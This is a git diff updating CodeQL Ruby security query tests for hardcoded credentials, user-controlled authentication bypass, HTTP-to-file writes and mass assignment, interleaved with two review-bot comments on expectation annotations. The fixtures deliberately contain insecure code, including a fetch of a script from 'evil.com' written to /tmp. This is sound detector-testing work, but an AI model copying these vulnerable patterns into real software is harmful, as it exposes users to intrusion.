| HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | +| HardcodedCredentials.rb:20:11:20:76 | "3jOe7sXKX6Tx52qHWUVqh2t9LNsE+..." | HardcodedCredentials.rb:20:11:20:76 | "3jOe7sXKX6Tx52qHWUVqh2t9LNsE+..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | +| HardcodedCredentials.rb:21:12:21:37 | "4fQuzXef4f2yow8KWvIJTA==" | HardcodedCredentials.rb:21:12:21:37 | "4fQuzXef4f2yow8KWvIJTA==" : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | +| HardcodedCredentials.rb:38:40:38:85 | "kdW/xVhiv6y1fQQNevDpUaq+2rfPK..." | HardcodedCredentials.rb:38:40:38:85 | "kdW/xVhiv6y1fQQNevDpUaq+2rfPK..." : String | HardcodedCredentials.rb:31:18:31:23 | passwd | This hardcoded value is $@. | HardcodedCredentials.rb:31:18:31:23 | passwd | used as credentials | +| HardcodedCredentials.rb:43:29:43:43 | "user@test.com" | HardcodedCredentials.rb:43:29:43:43 | "user@test.com" : String | HardcodedCredentials.rb:43:18:43:25 | username | This hardcoded value is $@. | HardcodedCredentials.rb:43:18:43:25 | username | used as credentials | +| HardcodedCredentials.rb:43:57:43:70 | "abcdef123456" | HardcodedCredentials.rb:43:57:43:70 | "abcdef123456" : String | HardcodedCredentials.rb:43:46:43:53 | password | This hardcoded value is $@. | HardcodedCredentials.rb:43:46:43:53 | password | used as credentials | edges | HardcodedCredentials.rb:12:19:12:64 | "4NQX/CqB5Ae98zFUmwj1DMpF7azsh..." : String | HardcodedCredentials.rb:1:23:1:30 | password | provenance | | | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." : String | HardcodedCredentials.rb:1:33:1:36 | cert | provenance | | 
@@ -41,15 +53,3 @@ nodes | HardcodedCredentials.rb:43:46:43:53 | password | semmle.label | password | | HardcodedCredentials.rb:43:57:43:70 | "abcdef123456" : String | semmle.label | "abcdef123456" : String | subpaths -#select -| HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | This hardcoded value is $@. | HardcodedCredentials.rb:4:20:4:65 | "xwjVWdfzfRlbcgKkbSfG/xSrUeHYq..." | used as credentials | -| HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | This hardcoded value is $@. | HardcodedCredentials.rb:8:30:8:75 | "X6BLgRWSAtAWG/GaHS+WGGW2K7zZF..." | used as credentials | -| HardcodedCredentials.rb:12:19:12:64 | "4NQX/CqB5Ae98zFUmwj1DMpF7azsh..." | HardcodedCredentials.rb:12:19:12:64 | "4NQX/CqB5Ae98zFUmwj1DMpF7azsh..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | -| HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | This hardcoded value is $@. | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | used as credentials | -| HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." | HardcodedCredentials.rb:15:30:15:75 | "WLC17dLQ9P8YlQvqm77qplOMm5pd1..." : String | HardcodedCredentials.rb:1:33:1:36 | cert | This hardcoded value is $@. | HardcodedCredentials.rb:1:33:1:36 | cert | used as credentials | -| HardcodedCredentials.rb:18:27:18:72 | "ogH6qSYWGdbR/2WOGYa7eZ/tObL+G..." 
| HardcodedCredentials.rb:18:27:18:72 | "ogH6qSYWGdbR/2WOGYa7eZ/tObL+G..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | -| HardcodedCredentials.rb:20:11:20:76 | "3jOe7sXKX6Tx52qHWUVqh2t9LNsE+..." | HardcodedCredentials.rb:20:11:20:76 | "3jOe7sXKX6Tx52qHWUVqh2t9LNsE+..." : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | -| HardcodedCredentials.rb:21:12:21:37 | "4fQuzXef4f2yow8KWvIJTA==" | HardcodedCredentials.rb:21:12:21:37 | "4fQuzXef4f2yow8KWvIJTA==" : String | HardcodedCredentials.rb:1:23:1:30 | password | This hardcoded value is $@. | HardcodedCredentials.rb:1:23:1:30 | password | used as credentials | -| HardcodedCredentials.rb:38:40:38:85 | "kdW/xVhiv6y1fQQNevDpUaq+2rfPK..." | HardcodedCredentials.rb:38:40:38:85 | "kdW/xVhiv6y1fQQNevDpUaq+2rfPK..." : String | HardcodedCredentials.rb:31:18:31:23 | passwd | This hardcoded value is $@. | HardcodedCredentials.rb:31:18:31:23 | passwd | used as credentials | -| HardcodedCredentials.rb:43:29:43:43 | "user@test.com" | HardcodedCredentials.rb:43:29:43:43 | "user@test.com" : String | HardcodedCredentials.rb:43:18:43:25 | username | This hardcoded value is $@. | HardcodedCredentials.rb:43:18:43:25 | username | used as credentials | -| HardcodedCredentials.rb:43:57:43:70 | "abcdef123456" | HardcodedCredentials.rb:43:57:43:70 | "abcdef123456" : String | HardcodedCredentials.rb:43:46:43:53 | password | This hardcoded value is $@. | HardcodedCredentials.rb:43:46:43:53 | password | used as credentials | diff --git a/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.qlref b/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.qlref index e65b7754872d..81afcc528c80 100644 --- a/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.qlref 
+++ b/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.qlref @@ -1 +1,2 @@ -queries/security/cwe-798/HardcodedCredentials.ql +query: queries/security/cwe-798/HardcodedCredentials.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.rb b/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.rb index 57f05a25fdf0..c405ceb630f2 100644 --- a/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.rb +++ b/ruby/ql/test/query-tests/security/cwe-798/HardcodedCredentials.rb @@ -1,24 +1,24 @@ -def authenticate(uid, password, cert: nil) +def authenticate(uid, password, cert: nil) # $ Sink if cert != nil then # comparison with hardcoded credential - return cert == "xwjVWdfzfRlbcgKkbSfG/xSrUeHYqxPgz9WKN3Yow1o=" + return cert == "xwjVWdfzfRlbcgKkbSfG/xSrUeHYqxPgz9WKN3Yow1o=" # $ Alert end # comparison with hardcoded credential - uid == 123 and password == "X6BLgRWSAtAWG/GaHS+WGGW2K7zZFTAjJ54fGSudHJk=" + uid == 123 and password == "X6BLgRWSAtAWG/GaHS+WGGW2K7zZFTAjJ54fGSudHJk=" # $ Alert end # call with hardcoded credential as argument -authenticate(123, "4NQX/CqB5Ae98zFUmwj1DMpF7azshxSvb0Jo4gIFmIQ=") +authenticate(123, "4NQX/CqB5Ae98zFUmwj1DMpF7azshxSvb0Jo4gIFmIQ=") # $ Alert # call with hardcoded credential as argument -authenticate(456, nil, cert: "WLC17dLQ9P8YlQvqm77qplOMm5pd1q25Q2onWqu78JI=") +authenticate(456, nil, cert: "WLC17dLQ9P8YlQvqm77qplOMm5pd1q25Q2onWqu78JI=") # $ Alert # concatenation involving literal -authenticate(789, "pw:" + "ogH6qSYWGdbR/2WOGYa7eZ/tObL+GtqDPx6q37BTTRQ=") +authenticate(789, "pw:" + "ogH6qSYWGdbR/2WOGYa7eZ/tObL+GtqDPx6q37BTTRQ=") # $ Alert -pw_left = "3jOe7sXKX6Tx52qHWUVqh2t9LNsE+ZXFj2qw6asRARTV2deAXFKkMTVOoaFYom1Q" -pw_right = "4fQuzXef4f2yow8KWvIJTA==" +pw_left = "3jOe7sXKX6Tx52qHWUVqh2t9LNsE+ZXFj2qw6asRARTV2deAXFKkMTVOoaFYom1Q" # $ Alert +pw_right = "4fQuzXef4f2yow8KWvIJTA==" # $ Alert pw = pw_left + pw_right authenticate(999, pw) 
@@ -28,18 +28,18 @@ def authenticate(uid, password, cert: nil) module Passwords class KnownPasswords - def include?(passwd) + def include?(passwd) # $ Sink passwd == "foo" end end end # Call to object method -Passwords::KnownPasswords.new.include?("kdW/xVhiv6y1fQQNevDpUaq+2rfPKfh+teE/45zS7bc=") +Passwords::KnownPasswords.new.include?("kdW/xVhiv6y1fQQNevDpUaq+2rfPKfh+teE/45zS7bc=") # $ Alert # Call to unrelated method with same name (should not be flagged) "foobar".include?("foo") -def default_cred(username = "user@test.com", password = "abcdef123456") +def default_cred(username = "user@test.com", password = "abcdef123456") # $ Alert username end \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.expected b/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.expected index 897e8276049f..fb60e7239398 100644 --- a/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.expected +++ b/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.expected 
@@ -1,3 +1,7 @@ +#select +| ConditionalBypass.rb:6:8:6:12 | check | ConditionalBypass.rb:3:13:3:18 | call to params | ConditionalBypass.rb:6:8:6:12 | check | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:8:7:8:29 | call to authenticate_user! | action | ConditionalBypass.rb:3:13:3:18 | call to params | user-provided value | +| ConditionalBypass.rb:14:14:14:27 | ...[...] | ConditionalBypass.rb:14:14:14:19 | call to params | ConditionalBypass.rb:14:14:14:27 | ...[...] | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:14:5:14:9 | call to login | action | ConditionalBypass.rb:14:14:14:19 | call to params | user-provided value | +| ConditionalBypass.rb:27:8:27:8 | p | ConditionalBypass.rb:25:10:25:15 | call to params | ConditionalBypass.rb:27:8:27:8 | p | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:28:7:28:13 | call to verify! | action | ConditionalBypass.rb:25:10:25:15 | call to params | user-provided value | edges | ConditionalBypass.rb:3:5:3:9 | check | ConditionalBypass.rb:6:8:6:12 | check | provenance | | | ConditionalBypass.rb:3:13:3:18 | call to params | ConditionalBypass.rb:3:13:3:26 | ...[...] | provenance | | 
@@ -20,7 +24,3 @@ nodes | ConditionalBypass.rb:25:10:25:22 | ...[...] | semmle.label | ...[...] | | ConditionalBypass.rb:27:8:27:8 | p | semmle.label | p | subpaths -#select -| ConditionalBypass.rb:6:8:6:12 | check | ConditionalBypass.rb:3:13:3:18 | call to params | ConditionalBypass.rb:6:8:6:12 | check | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:8:7:8:29 | call to authenticate_user! | action | ConditionalBypass.rb:3:13:3:18 | call to params | user-provided value | -| ConditionalBypass.rb:14:14:14:27 | ...[...] | ConditionalBypass.rb:14:14:14:19 | call to params | ConditionalBypass.rb:14:14:14:27 | ...[...] | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:14:5:14:9 | call to login | action | ConditionalBypass.rb:14:14:14:19 | call to params | user-provided value | -| ConditionalBypass.rb:27:8:27:8 | p | ConditionalBypass.rb:25:10:25:15 | call to params | ConditionalBypass.rb:27:8:27:8 | p | This condition guards a sensitive $@, but a $@ controls it. | ConditionalBypass.rb:28:7:28:13 | call to verify! | action | ConditionalBypass.rb:25:10:25:15 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.qlref b/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.qlref index 9639e207d1ee..5b8e3bc44f1d 100644 --- a/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.qlref +++ b/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.qlref @@ -1 +1,2 @@ -experimental/cwe-807/ConditionalBypass.ql \ No newline at end of file +query: experimental/cwe-807/ConditionalBypass.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.rb b/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.rb index 1bd45f15043f..1a6dd87ab791 100644 --- a/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.rb +++ b/ruby/ql/test/query-tests/security/cwe-807-user-controlled-bypass/ConditionalBypass.rb @@ -1,9 +1,9 @@ class FooController < ActionController::Base def bad_handler1 - check = params[:check] + check = params[:check] # $ Source name = params[:name] - if check + if check # $ Alert # BAD authenticate_user! name end @@ -11,7 +11,7 @@ def bad_handler1 def bad_handler2 # BAD - login if params[:login] + login if params[:login] # $ Alert do_something_else end @@ -22,9 +22,9 @@ def bad_handler3 end def bad_handler4 - p = (params[:name] == "foo") + p = (params[:name] == "foo") # $ Source # BAD - if p + if p # $ Alert verify! end end diff --git a/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.expected b/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.expected index 792b17303b10..11975de723a3 100644 --- a/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.expected +++ b/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.expected 
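Review bot: `bad_handler3` appears to be the only handler in this file that ends up with neither `# $ Alert` nor `# $ MISSING: Alert`, and the `#select` rows in ConditionalBypass.expected cover only lines 6, 14 and 27. Its body lies outside these hunks, so this is inferred from the name in the `@@ -22,9 +22,9 @@ def bad_handler3` context alone. If it is a known false negative of the conditional-bypass query, annotate its guard with `# $ MISSING: Alert` so the gap in bypass coverage is recorded in the test instead of staying silent.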
@@ -1,3 +1,6 @@ +#select +| http_to_file_access.rb:5:12:5:15 | resp | http_to_file_access.rb:3:8:3:52 | call to body | http_to_file_access.rb:5:12:5:15 | resp | Write to file system depends on $@. | http_to_file_access.rb:3:8:3:52 | call to body | untrusted data | +| http_to_file_access.rb:11:18:11:23 | script | http_to_file_access.rb:9:16:9:21 | call to params | http_to_file_access.rb:11:18:11:23 | script | Write to file system depends on $@. | http_to_file_access.rb:9:16:9:21 | call to params | untrusted data | edges | http_to_file_access.rb:3:1:3:4 | resp | http_to_file_access.rb:5:12:5:15 | resp | provenance | | | http_to_file_access.rb:3:8:3:52 | call to body | http_to_file_access.rb:3:1:3:4 | resp | provenance | | @@ -13,6 +16,3 @@ nodes | http_to_file_access.rb:9:16:9:30 | ...[...] | semmle.label | ...[...] | | http_to_file_access.rb:11:18:11:23 | script | semmle.label | script | subpaths -#select -| http_to_file_access.rb:5:12:5:15 | resp | http_to_file_access.rb:3:8:3:52 | call to body | http_to_file_access.rb:5:12:5:15 | resp | Write to file system depends on $@. | http_to_file_access.rb:3:8:3:52 | call to body | untrusted data | -| http_to_file_access.rb:11:18:11:23 | script | http_to_file_access.rb:9:16:9:21 | call to params | http_to_file_access.rb:11:18:11:23 | script | Write to file system depends on $@. | http_to_file_access.rb:9:16:9:21 | call to params | untrusted data | diff --git a/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.qlref b/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.qlref index 2b41f979bb58..06312044c512 100644 --- a/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.qlref +++ b/ruby/ql/test/query-tests/security/cwe-912/HttpToFileAccess.qlref @@ -1 +1,2 @@ -queries/security/cwe-912/HttpToFileAccess.ql \ No newline at end of file +query: queries/security/cwe-912/HttpToFileAccess.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/ruby/ql/test/query-tests/security/cwe-912/http_to_file_access.rb b/ruby/ql/test/query-tests/security/cwe-912/http_to_file_access.rb index aa8ce4c46ff0..e9783c063763 100644 --- a/ruby/ql/test/query-tests/security/cwe-912/http_to_file_access.rb +++ b/ruby/ql/test/query-tests/security/cwe-912/http_to_file_access.rb @@ -1,14 +1,14 @@ require "net/http" -resp = Net::HTTP.new("evil.com").get("/script").body +resp = Net::HTTP.new("evil.com").get("/script").body # $ Source file = File.open("/tmp/script", "w") -file.write(resp) # BAD +file.write(resp) # BAD # $ Alert class ExampleController < ActionController::Base def example - script = params[:script] + script = params[:script] # $ Source file = File.open("/tmp/script", "w") - file.write(script) # BAD + file.write(script) # BAD # $ Alert end def example2 diff --git a/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.expected b/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.expected index 3b23376ac8d1..f859557ffde6 100644 --- a/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.expected +++ b/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.expected 
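Review bot: In `file.write(resp) # BAD # $ Alert` and `file.write(script) # BAD # $ Alert` the expectation comes after other comment text, so the Ruby comment body begins with `BAD` rather than `$`. If the inline-expectations parser only reads comments whose first non-blank character is `$` (my recollection, to be confirmed), these two file-write sinks are effectively unannotated and the postprocess step would report their alerts as unexpected. Running the test would settle it; the safe form is to move `# BAD` to its own line above and leave `# $ Alert` alone on the statement. The same `# BAD # $ Alert` shape is used in `create4` of cwe-915/test.rb.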
@@ -1,3 +1,25 @@ +#select +| test.rb:8:18:8:28 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:8:18:8:28 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:18:20:18:30 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:18:20:18:30 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:19:21:19:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:19:21:19:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:20:22:20:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:20:22:20:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:21:21:21:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:21:21:21:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:22:22:22:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:22:22:22:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:25:21:25:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:25:21:25:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. 
| test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:26:24:26:34 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:26:24:26:34 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:27:22:27:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:27:22:27:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:28:25:28:35 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:28:25:28:35 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:29:21:29:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:29:21:29:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:31:32:31:42 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:31:32:31:42 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:32:33:32:43 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:32:33:32:43 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:33:36:33:46 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:33:36:33:46 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. 
| test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:34:32:34:42 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:34:32:34:42 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:35:33:35:43 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:35:33:35:43 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:36:26:36:36 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:36:26:36:36 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:49:18:49:18 | x | test.rb:47:13:47:18 | call to params | test.rb:49:18:49:18 | x | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:47:13:47:18 | call to params | this remote flow source | +| test.rb:51:18:51:40 | call to permit | test.rb:51:18:51:23 | call to params | test.rb:51:18:51:40 | call to permit | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:51:18:51:23 | call to params | this remote flow source | +| test.rb:52:18:52:69 | call to permit | test.rb:52:18:52:23 | call to params | test.rb:52:18:52:69 | call to permit | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:52:18:52:23 | call to params | this remote flow source | +| test.rb:53:18:53:35 | call to to_unsafe_h | test.rb:53:18:53:23 | call to params | test.rb:53:18:53:35 | call to to_unsafe_h | This mass assignment operation can assign user-controlled attributes from $@. 
| test.rb:53:18:53:23 | call to params | this remote flow source | edges | test.rb:43:9:43:14 | call to params | test.rb:43:9:43:29 | call to require | provenance | | | test.rb:43:9:43:29 | call to require | test.rb:43:9:43:37 | call to permit! | provenance | Config | 
@@ -60,25 +82,3 @@ nodes | test.rb:53:18:53:23 | call to params | semmle.label | call to params | | test.rb:53:18:53:35 | call to to_unsafe_h | semmle.label | call to to_unsafe_h | subpaths -#select -| test.rb:8:18:8:28 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:8:18:8:28 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:18:20:18:30 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:18:20:18:30 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:19:21:19:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:19:21:19:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:20:22:20:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:20:22:20:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:21:21:21:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:21:21:21:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:22:22:22:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:22:22:22:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. 
| test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:25:21:25:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:25:21:25:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:26:24:26:34 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:26:24:26:34 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:27:22:27:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:27:22:27:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:28:25:28:35 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:28:25:28:35 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:29:21:29:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:29:21:29:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:31:32:31:42 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:31:32:31:42 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:32:33:32:43 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:32:33:32:43 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. 
| test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:33:36:33:46 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:33:36:33:46 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:34:32:34:42 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:34:32:34:42 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:35:33:35:43 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:35:33:35:43 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:36:26:36:36 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:36:26:36:36 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | -| test.rb:49:18:49:18 | x | test.rb:47:13:47:18 | call to params | test.rb:49:18:49:18 | x | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:47:13:47:18 | call to params | this remote flow source | -| test.rb:51:18:51:40 | call to permit | test.rb:51:18:51:23 | call to params | test.rb:51:18:51:40 | call to permit | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:51:18:51:23 | call to params | this remote flow source | -| test.rb:52:18:52:69 | call to permit | test.rb:52:18:52:23 | call to params | test.rb:52:18:52:69 | call to permit | This mass assignment operation can assign user-controlled attributes from $@. 
| test.rb:52:18:52:23 | call to params | this remote flow source | -| test.rb:53:18:53:35 | call to to_unsafe_h | test.rb:53:18:53:23 | call to params | test.rb:53:18:53:35 | call to to_unsafe_h | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:53:18:53:23 | call to params | this remote flow source | diff --git a/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.qlref b/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.qlref index 89dbc405a3ae..d60d17065b7d 100644 --- a/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.qlref +++ b/ruby/ql/test/query-tests/security/cwe-915/MassAssignment.qlref @@ -1 +1,2 @@ -queries/security/cwe-915/MassAssignment.ql \ No newline at end of file +query: queries/security/cwe-915/MassAssignment.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-915/test.rb b/ruby/ql/test/query-tests/security/cwe-915/test.rb index c72ad536ef73..6af19ca39d4f 100644 --- a/ruby/ql/test/query-tests/security/cwe-915/test.rb +++ b/ruby/ql/test/query-tests/security/cwe-915/test.rb @@ -5,7 +5,7 @@ class User < ApplicationRecord class UserController < ActionController::Base def create # BAD: arbitrary params are permitted to be used for this assignment - User.new(user_params).save! + User.new(user_params).save! # $ Alert end def create2 
@@ -15,42 +15,42 @@ def create2 def create3 # each BAD - User.build(user_params) - User.create(user_params) - User.create!(user_params) - User.insert(user_params) - User.insert!(user_params) + User.build(user_params) # $ Alert + User.create(user_params) # $ Alert + User.create!(user_params) # $ Alert + User.insert(user_params) # $ Alert + User.insert!(user_params) # $ Alert User.insert_all([user_params]) User.insert_all!([user_params]) - User.update(user_params) - User.update(7, user_params) - User.update!(user_params) - User.update!(7, user_params) - User.upsert(user_params) + User.update(user_params) # $ Alert + User.update(7, user_params) # $ Alert + User.update!(user_params) # $ Alert + User.update!(7, user_params) # $ Alert + User.upsert(user_params) # $ Alert User.upsert([user_params]) - User.find_or_create_by(user_params) - User.find_or_create_by!(user_params) - User.find_or_initialize_by(user_params) - User.create_or_find_by(user_params) - User.create_or_find_by!(user_params) - User.create_with(user_params) + User.find_or_create_by(user_params) # $ Alert + User.find_or_create_by!(user_params) # $ Alert + User.find_or_initialize_by(user_params) # $ Alert + User.create_or_find_by(user_params) # $ Alert + User.create_or_find_by!(user_params) # $ Alert + User.create_with(user_params) # $ Alert user = User.where(name:"abc") user.update(user_params) end def user_params - 